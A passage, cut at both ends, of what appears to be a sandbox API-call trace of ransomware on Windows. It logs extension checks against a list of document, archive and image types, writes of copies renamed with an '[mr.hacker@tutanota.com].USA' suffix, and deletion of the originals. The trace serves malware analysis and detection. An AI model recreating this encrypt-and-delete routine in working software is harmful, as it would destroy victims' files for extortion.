"c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.046] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.046] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.046] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.046] lstrlenW (lpString=".doc") returned 4 [0264.046] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.046] lstrlenW (lpString=".docx") returned 5 [0264.046] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.046] lstrlenW (lpString=".pdf") returned 4 [0264.046] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.046] lstrlenW (lpString=".xls") returned 4 [0264.046] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.046] lstrlenW (lpString=".xlsx") returned 5 [0264.046] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.046] lstrlenW (lpString=".ppt") returned 4 [0264.046] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.046] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.046] lstrlenW (lpString=".zip") returned 4 [0264.047] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.047] lstrlenW (lpString=".rar") returned 4 [0264.047] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.047] lstrlenW (lpString=".bz2") returned 4 [0264.047] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.047] lstrlenW (lpString=".7z") returned 3 [0264.047] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.047] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.047] lstrlenW (lpString=".dbf") returned 4 [0264.047] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.047] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.047] lstrlenW (lpString=".1cd") returned 4 [0264.047] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.047] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.047] lstrlenW (lpString=".jpg") returned 4 [0264.047] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.047] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.047] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.047] lstrlenW (lpString=".doc") returned 4 [0264.047] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.047] lstrlenW (lpString=".docx") returned 5 [0264.047] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.047] lstrlenW (lpString=".pdf") returned 4 [0264.047] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.047] lstrlenW (lpString=".xls") returned 4 [0264.047] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.047] lstrlenW (lpString=".xlsx") returned 5 [0264.047] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.047] lstrlenW (lpString=".ppt") returned 4 [0264.048] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.048] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.048] lstrlenW (lpString=".zip") returned 4 [0264.048] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.048] lstrlenW (lpString=".rar") returned 4 [0264.048] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.048] lstrlenW (lpString=".bz2") returned 4 [0264.048] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.048] lstrlenW (lpString=".7z") returned 3 [0264.048] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.048] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.048] lstrlenW (lpString=".dbf") returned 4 [0264.048] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.048] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.048] lstrlenW (lpString=".1cd") returned 4 [0264.048] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.048] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0264.048] lstrlenW (lpString=".jpg") returned 4 [0264.048] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.048] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.048] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0264.048] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.048] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=76352) returned 1 [0264.049] CloseHandle (hObject=0x34c) returned 1 [0264.049] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0264.049] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.049] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.049] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.049] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.049] lstrlenW (lpString=".doc") returned 4 [0264.049] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.049] lstrlenW (lpString=".docx") returned 5 [0264.049] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.049] lstrlenW (lpString=".pdf") returned 4 [0264.049] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.049] lstrlenW (lpString=".xls") returned 4 [0264.049] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.049] lstrlenW (lpString=".xlsx") returned 5 [0264.049] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.049] lstrlenW (lpString=".ppt") returned 4 [0264.049] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.049] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.049] lstrlenW (lpString=".zip") returned 4 [0264.049] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.049] lstrlenW (lpString=".rar") returned 4 [0264.049] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.049] lstrlenW (lpString=".bz2") returned 4 [0264.049] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.049] lstrlenW (lpString=".7z") returned 3 [0264.049] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString=".dbf") returned 4 [0264.050] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString=".1cd") returned 4 [0264.050] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString=".jpg") returned 4 [0264.050] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString=".doc") returned 4 [0264.050] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.050] lstrlenW (lpString=".docx") returned 5 [0264.050] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.050] lstrlenW (lpString=".pdf") returned 4 [0264.050] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.050] lstrlenW (lpString=".xls") returned 4 [0264.050] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.050] lstrlenW (lpString=".xlsx") returned 5 [0264.050] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.050] lstrlenW (lpString=".ppt") returned 4 [0264.050] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.050] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.050] lstrlenW (lpString=".zip") returned 4 [0264.050] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.050] lstrlenW (lpString=".rar") returned 4 [0264.050] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.050] lstrlenW (lpString=".bz2") returned 4 [0264.051] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.051] lstrlenW (lpString=".7z") returned 3 [0264.051] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.051] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.051] lstrlenW (lpString=".dbf") returned 4 [0264.051] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.051] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.051] lstrlenW (lpString=".1cd") returned 4 [0264.051] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.051] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0264.051] lstrlenW (lpString=".jpg") returned 4 [0264.051] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.051] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.051] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0264.051] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.051] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=75344) returned 1 [0264.051] CloseHandle (hObject=0x34c) returned 1 [0264.051] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0264.051] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.051] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.052] lstrlenW (lpString=".doc") returned 4 [0264.052] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.052] lstrlenW (lpString=".docx") returned 5 [0264.052] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.052] lstrlenW (lpString=".pdf") returned 4 [0264.052] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.052] lstrlenW (lpString=".xls") returned 4 [0264.052] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.052] lstrlenW (lpString=".xlsx") returned 5 [0264.052] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.052] lstrlenW (lpString=".ppt") returned 4 [0264.052] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.052] lstrlenW (lpString=".zip") returned 4 [0264.052] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.052] lstrlenW (lpString=".rar") returned 4 [0264.052] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.052] lstrlenW (lpString=".bz2") returned 4 [0264.052] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.052] lstrlenW (lpString=".7z") returned 3 [0264.052] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.052] lstrlenW (lpString=".dbf") returned 4 [0264.052] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.052] lstrlenW (lpString=".1cd") returned 4 [0264.052] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.052] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.053] lstrlenW (lpString=".jpg") returned 4 [0264.053] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.053] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.053] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.053] lstrlenW (lpString=".doc") returned 4 [0264.053] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.053] lstrlenW (lpString=".docx") returned 5 [0264.053] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.053] lstrlenW (lpString=".pdf") returned 4 [0264.053] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.053] lstrlenW (lpString=".xls") returned 4 [0264.053] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.053] lstrlenW (lpString=".xlsx") returned 5 [0264.053] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.053] lstrlenW (lpString=".ppt") returned 4 [0264.053] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.053] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.053] lstrlenW (lpString=".zip") returned 4 [0264.053] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.053] lstrlenW (lpString=".rar") returned 4 [0264.053] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.053] lstrlenW (lpString=".bz2") returned 4 [0264.053] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.053] lstrlenW (lpString=".7z") returned 3 [0264.053] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.053] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.053] lstrlenW (lpString=".dbf") returned 4 [0264.053] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.053] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.054] lstrlenW (lpString=".1cd") returned 4 [0264.054] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.054] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0264.054] lstrlenW (lpString=".jpg") returned 4 [0264.054] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.054] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0264.054] lstrlenW (lpString="memtest.exe") returned 11 [0264.054] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.054] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=485760) returned 1 [0264.054] CloseHandle (hObject=0x34c) returned 1 [0264.054] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0264.054] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.054] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.054] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0264.054] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0264.054] lstrlenW (lpString=".doc") returned 4 [0264.054] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0264.054] lstrlenW (lpString=".docx") returned 5 [0264.054] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0264.055] lstrlenW (lpString=".pdf") returned 4 [0264.055] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0264.055] lstrlenW (lpString=".xls") returned 4 [0264.055] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0264.055] lstrlenW (lpString=".xlsx") returned 5 [0264.055] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0264.055] lstrlenW (lpString=".ppt") returned 4 [0264.055] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0264.055] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0264.055] lstrlenW (lpString=".zip") returned 4 [0264.055] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0264.055] lstrlenW (lpString=".rar") returned 4 [0264.055] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0264.055] lstrlenW (lpString=".bz2") returned 4 [0264.055] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0264.055] lstrlenW (lpString=".7z") returned 3 [0264.055] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0264.275] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.268] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0265.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.268] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=8192) returned 1 [0265.268] CloseHandle (hObject=0x2a8) returned 1 [0265.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll")) returned 0x20 [0265.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.269] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0265.269] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0265.269] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0265.269] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0265.269] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0265.269] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0265.269] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0265.269] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0265.269] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0265.270] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0265.270] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0265.270] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0265.270] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0265.270] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0265.270] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0265.270] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0265.270] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0265.270] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0265.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.338] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=1499136) returned 1 [0265.338] CloseHandle (hObject=0x380) returned 1 [0265.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")) returned 0x20 [0265.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.852] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.852] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0265.976] GetLastError () returned 0x0 [0265.976] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x3a18, lpOverlapped=0x0) returned 1 [0265.993] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0265.994] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0265.994] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xee, lpOverlapped=0x0) returned 1 [0265.994] SetEndOfFile (hFile=0x384) returned 1 [0265.994] CloseHandle (hObject=0x384) returned 1 [0265.994] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.995] SetEndOfFile (hFile=0x2b4) returned 1 [0266.030] CloseHandle (hObject=0x2b4) returned 1 [0266.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0266.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll")) returned 1 [0266.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString=".doc") returned 4 [0266.031] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString=".docx") returned 5 [0266.031] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0266.031] lstrlenW (lpString=".pdf") returned 4 [0266.031] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString=".xls") returned 4 [0266.031] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0266.031] lstrlenW (lpString=".xlsx") returned 5 [0266.031] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0266.031] lstrlenW 